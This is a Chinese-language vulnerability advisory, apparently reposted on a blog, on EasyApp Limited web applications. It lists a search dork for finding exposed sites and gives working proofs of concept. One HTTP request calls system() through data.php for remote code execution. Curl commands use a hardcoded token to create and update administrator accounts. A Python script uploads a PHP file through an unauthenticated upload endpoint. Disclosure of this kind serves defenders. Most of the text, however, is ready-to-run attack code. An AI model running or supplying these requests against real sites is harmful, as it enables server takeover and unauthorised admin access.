EasyApp Limited多重安全漏洞深度分析

本文详细披露了EasyApp Limited旗下多款产品存在的严重安全漏洞,包括PHP反序列化漏洞、硬编码凭证绕过、未授权文件操作等,提供了完整的技术分析和验证方法。

EasyApp Limited - 多重安全漏洞

2025.08.23 信用评级:bRpsd

风险等级:中等 本地漏洞:否 远程漏洞:是 CVE:N/A CWE:N/A Dork:Powered By EasyApp Limited inurl:app/web

漏洞详情

漏洞1:PHP对象注入(CWE-502:不可信数据反序列化)

函数直接处理来自php://input的未净化JSON输入,导致未授权远程代码执行 文件:/app/php/data.php

代码:

1
2
3
4
5

$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true); 
// 调用自定义函数
echo json_encode($json["action"]($json["data"]));

概念验证:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive

{"action":"system","data":"whoami"}

响应:
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

root
"root"

使用CURL:

1
2
3
4
5

curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'

"Darwin"

漏洞2:静态令牌绕过(CWE-798:使用硬编码凭证)

文件:/app/admin2/php/data.php

代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

function getAppAccessRight($functionName,$param)
{
    $data = array();
    $data["status"] = "SUCCESS"; 
    $uid = $_COOKIE["uid"]; 
    $token = $_COOKIE["token"]; 
    $escapeFunction = ESCAPE_FUNC_TOKEN; 
    
    if (strpos($escapeFunction, $functionName) !== false)
        return $data; 
    if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
        return $data;

这意味着可以通过硬编码令牌轻松绕过对/app/admin2/php/data.php的任意管理员函数调用:

概念验证:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

# 更新管理员账户
curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "updateAdmin",
    "data": {
      "fullname": "X",
      "loginid": "XXXXXXXXXX",
      "pwd": "XXXXXXXXXX",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'

响应:{"uid":"UID_HERE","status":"SUCCESS"}

# 创建管理员账户
curl -X POST \
  'https://localhost/app/admin2/php/data.php' \
  -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
  -H 'Content-Type: application/json' \
  -d '{
    "action": "createAdmin",
    "data": {
      "fullname": "X",
      "loginid": "X",
      "pwd": "X",
      "email": "X@X.com",
      "role": "ADMIN",
      "userid": "1",
      "imgattachid": "1"
    }
  }'

响应:{"uid":"UID_HERE","status":"SUCCESS"}

漏洞3:未授权任意文件上传、删除和暴露

路径:app/admin2/userimg

直接访问可暴露上传到目录/app/admin2/userimg/的文件列表:

示例:

1

{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}

上传test.php的Python代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

import requests

url = "https://localhost/app/admin2/userimg/"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br, zstd",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://localhost/",
    "Connection": "keep-alive",
    "Referer": "https://localhost/app/admin2/news-list-add.php",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin"
}

payload = {
    'attachid': '1',
    'gtitle_zh': '1',
    'linkid': '1'
}

files = {
    'files[]': ('x.PhP', 'test', 'multipart/form-data')
}

response = requests.post(url, headers=headers, data=payload, files=files)

print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)

其他安全弱点

  1. 使用HTML JS重定向而非基于PHP的代码来阻止管理员访问[/app/admin2/],导致任何人都可以查看管理员仪表板及其HTML源代码并进行篡改

  2. 依赖可被伪造的HTTP_CLIENT_IP或HTTP_X_FORWARDED_FOR头部进行身份验证,存在IP地址欺骗风险

  3. 弱加密算法

  4. 缺乏CSRF/XSS/SQL注入控制

  5. 代码生成控制不当,如使用"strpos($escapeFunction, $functionName)“而非"strpos($functionName, $escapeFunction)",在2FA激活中将"TRUE"错误拼写为"TURE”

  6. 可访问的测试文件,如路径/app/admin2/testFn.php[任意文件上传]以及其他易受攻击的端点

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次